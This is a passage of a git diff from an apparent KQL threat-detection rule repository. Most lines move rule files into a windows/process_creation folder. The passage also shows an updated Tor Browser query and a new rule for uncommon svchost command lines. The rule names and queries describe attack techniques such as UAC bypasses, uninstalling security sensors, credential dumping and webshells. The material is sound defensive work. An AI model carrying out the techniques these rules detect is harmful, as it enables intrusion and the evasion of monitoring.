KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql rename to KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql diff --git a/KQL/rules/Command and Control/tor_client_browser_execution.kql b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql similarity index 59% rename from KQL/rules/Command and Control/tor_client_browser_execution.kql rename to KQL/rules/windows/process_creation/tor_client_browser_execution.kql index 48359a1e..f4a77dd9 100644 --- a/KQL/rules/Command and Control/tor_client_browser_execution.kql +++ b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql @@ -7,4 +7,4 @@ // Tags: attack.command-and-control, attack.t1090.003 DeviceProcessEvents -| where FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe" \ No newline at end of file +| where ProcessVersionInfoFileDescription =~ "Tor Browser" or ProcessVersionInfoProductName =~ "Tor Browser" or (FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql similarity index 100% rename from KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql rename to KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql rename to KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql rename to KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql b/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql b/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql similarity index 100% rename from KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql rename to KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql b/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql rename to KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql rename to KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql b/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_wsreset.kql rename to KQL/rules/windows/process_creation/uac_bypass_wsreset.kql diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql similarity index 100% rename from KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql rename to KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql rename to KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql diff --git a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql rename to KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql rename to KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql rename to KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql diff --git a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql similarity index 100% rename from KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql rename to KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql rename to KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql rename to KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql diff --git a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql similarity index 100% rename from KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql rename to KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql similarity index 100% rename from KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql rename to KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql diff --git a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql rename to KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql rename to KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql diff --git a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql similarity index 100% rename from KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql rename to KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql rename to KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql diff --git a/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql new file mode 100644 index 00000000..6f0c33dd --- /dev/null +++ b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql @@ -0,0 +1,13 @@ +// Title: Uncommon Svchost Command Line Parameter +// Author: Liran Ravich +// Date: 2025-11-14 +// Level: high +// Description: Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns. +// This could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1036.005, attack.t1055, attack.t1055.012 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\svchost.exe" and (not((ProcessCommandLine =~ "" or ProcessCommandLine matches regex "-k\\s\\w{1,64}(\\s?(-p|-s))?" or isnull(ProcessCommandLine)))) and (not(((ProcessCommandLine contains "svchost.exe" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (ProcessCommandLine =~ "svchost.exe" and InitiatingProcessFolderPath endswith "\\MRT.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql rename to KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql diff --git a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql b/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql similarity index 100% rename from KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql rename to KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql diff --git a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql similarity index 100% rename from KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql rename to KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql diff --git a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql b/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql similarity index 100% rename from KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql rename to KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql diff --git a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql b/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql rename to KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql diff --git a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql similarity index 100% rename from KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql rename to KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql diff --git a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql b/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql similarity index 100% rename from KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql rename to KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql diff --git a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql similarity index 100% rename from KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql rename to KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql diff --git a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql similarity index 100% rename from KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql rename to KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql diff --git a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql rename to KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql rename to KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql rename to KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql similarity index 100% rename from KQL/rules/Execution/use_of_fsharp_interpreters.kql rename to KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql diff --git a/KQL/rules/Execution/use_of_openconsole.kql b/KQL/rules/windows/process_creation/use_of_openconsole.kql similarity index 100% rename from KQL/rules/Execution/use_of_openconsole.kql rename to KQL/rules/windows/process_creation/use_of_openconsole.kql diff --git a/KQL/rules/Execution/use_of_pcalua_for_execution.kql b/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql similarity index 100% rename from KQL/rules/Execution/use_of_pcalua_for_execution.kql rename to KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql diff --git a/KQL/rules/Defense Evasion/use_of_remote_exe.kql b/KQL/rules/windows/process_creation/use_of_remote_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_of_remote_exe.kql rename to KQL/rules/windows/process_creation/use_of_remote_exe.kql diff --git a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql b/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql rename to KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql diff --git a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql rename to KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql diff --git a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql b/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql rename to KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql diff --git a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql b/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql similarity index 100% rename from KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql rename to KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql diff --git a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql b/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql rename to KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql diff --git a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql b/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql rename to KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql diff --git a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql b/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql similarity index 100% rename from KQL/rules/Discovery/use_of_w32tm_as_timer.kql rename to KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql diff --git a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql b/KQL/rules/windows/process_creation/use_of_wfc_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_of_wfc_exe.kql rename to KQL/rules/windows/process_creation/use_of_wfc_exe.kql diff --git a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql b/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql similarity index 100% rename from KQL/rules/Defense Evasion/use_short_name_path_in_image.kql rename to KQL/rules/windows/process_creation/use_short_name_path_in_image.kql diff --git a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql b/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql similarity index 100% rename from KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql rename to KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql diff --git a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql b/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql similarity index 100% rename from KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql rename to KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql diff --git a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql b/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql similarity index 100% rename from KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql rename to KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql diff --git a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql similarity index 100% rename from KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql rename to KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql diff --git a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql similarity index 100% rename from KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql rename to KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql diff --git a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql rename to KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql diff --git a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql b/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql similarity index 100% rename from KQL/rules/Collection/veeam_backup_database_suspicious_query.kql rename to KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql diff --git a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql similarity index 100% rename from KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql rename to KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql diff --git a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql b/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql similarity index 100% rename from KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql rename to KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql diff --git a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql similarity index 100% rename from KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql rename to KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql diff --git a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql b/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql rename to KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql similarity index 100% rename from KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql rename to KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql similarity index 100% rename from KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql rename to KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql similarity index 100% rename from KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql rename to KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql similarity index 100% rename from KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql rename to KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql similarity index 100% rename from KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql rename to KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql diff --git a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql b/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql rename to KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql diff --git a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql similarity index 100% rename from KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql rename to KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql diff --git a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql rename to KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql diff --git a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql similarity index 100% rename from KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql rename to KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql similarity index 100% rename from KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql rename to KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql similarity index 100% rename from KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql rename to KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql diff --git a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql b/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql similarity index 100% rename from KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql rename to KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql similarity index 100% rename from KQL/rules/Persistence/webshell_hacking_activity_patterns.kql rename to KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql similarity index 100% rename from KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql rename to KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql diff --git a/KQL/rules/Discovery/whoami_as_parameter.kql b/KQL/rules/windows/process_creation/whoami_as_parameter.kql similarity index 100% rename from KQL/rules/Discovery/whoami_as_parameter.kql rename to KQL/rules/windows/process_creation/whoami_as_parameter.kql diff --git a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql similarity index 100% rename from KQL/rules/Discovery/whoami_exe_execution_anomaly.kql rename to KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql diff --git a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql similarity index 100% rename from KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql rename to KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql diff --git a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql similarity index 100% rename from KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql rename to KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql diff --git a/KQL/rules/Lateral 